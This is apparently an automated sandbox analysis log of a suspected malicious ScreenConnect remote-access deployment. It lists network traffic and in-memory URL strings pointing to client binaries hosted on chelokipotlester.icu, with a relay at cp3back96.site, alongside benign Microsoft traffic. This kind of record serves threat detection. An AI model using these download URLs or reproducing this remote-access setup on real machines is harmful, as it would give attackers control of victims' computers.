              Source: global traffic HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: */* Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: fp.msedge.net Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /apc/trans.gif?a75363d0418258491551ead6717ca895 HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: c-ring.msedge.net Connection: Keep-Alive
              Source: global traffic HTTP traffic detected: GET /apc/trans.gif?3d4619f8959a0bb944ce9eb8ccf482ff HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: c-ring.msedge.net Connection: Keep-Alive
              Source: global traffic DNS traffic detected: DNS query: cp9856.chelokipotlester.icu
              Source: global traffic DNS traffic detected: DNS query: www.google.com
              Source: global traffic DNS traffic detected: DNS query: cp3back96.site
              Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: */* Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1707317755 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 60 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75 X-Device-ClientSession: B2DC660161784379B3117A8C8CEC12A1 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2 X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 765 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=3a628620&IPMID=1707317755885; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3544000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A35EB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A38E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.or
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A32B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
              Source: dfsvc.exe, 0000000E.00000002.2362337235.00000212BD142000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.cheloki
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotl
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A348D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Clie
              Source: dfsvc.exe, 0000000E.00000002.2365394785.00000212BD6BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.ap
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wi
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.Wih
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.drString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application089a7
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application1
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application2
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948935379.000000001B484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application8
              Source: C7EOHWRV.log.14.dr, Unconfirmed 974768.crdownload.0.dr, chromecache_128.1.drString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationK
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationX
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1948396561.000000001B42D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationZ
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationre=msila
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applications
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationuLXGWokl
              Source: dfsvc.exe, 0000000E.00000002.2367012990.00000212BEEE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationw
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A362E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.applicationx
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.dll
              Source: ScreenConnect.WindowsClient.exe, 00000011.00000002.1946552132.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, C7EOHWRV.log.14.drString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Client.manifest
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientSe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.dll
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe
              Source: dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.ClientService.exe_
              Source: dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Core.dll
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A36CE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll
              Source: dfsvc.exe, 0000000E.00000002.2367617805.00000212BEF59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.Windows.dll63:
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstage
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.ex
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2366106744.00000212BEE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
              Source: dfsvc.exe, 0000000E.00000002.2367830615.00000212BEF7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configt
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A341C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2368068234.00000212BEFDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2344956030.00000212A16DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config
              Source: dfsvc.exe, 0000000E.00000002.2368249036.00000212BEFF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exe.config-U
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsClient.exx
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.e
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A398A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
              Source: dfsvc.exe, 0000000E.00000002.2359951085.00000212BB8EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManager.exe.configg
              Source: dfsvc.exe, 0000000E.00000002.2346639670.00000212A3A29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp9856.chelokipotlester.icu/Bin/ScreenConnect.WindowsFileManagp
              Source: svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
              Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000007.00000002.1367177095.0000024F94681000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366519593.0000024F9465A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000007.00000002.1367024630.0000024F9463F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367108889.0000024F94665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000007.00000002.1367042117.0000024F94644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366457343.0000024F9465D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000007.00000003.1366380334.0000024F94662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: ScreenConnect.Core.dll.14.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
              Source: edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
              Source: svchost.exe, 00000004.00000003.1202956022.00000227BD062000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virt
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtuX
              Source: svchost.exe, 00000007.00000003.1366547425.0000024F94641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366532997.0000024F94649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000007.00000002.1366965576.0000024F94624000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000007.00000003.1366577768.0000024F94630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.x
              Source: svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000007.00000002.1367091647.0000024F94659000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1366471908.0000024F94658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 37.221.67.19:443 -> 192.168.2.16:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49739 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.219.254:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_BE4413523710330F97BEE5D4A544C42B
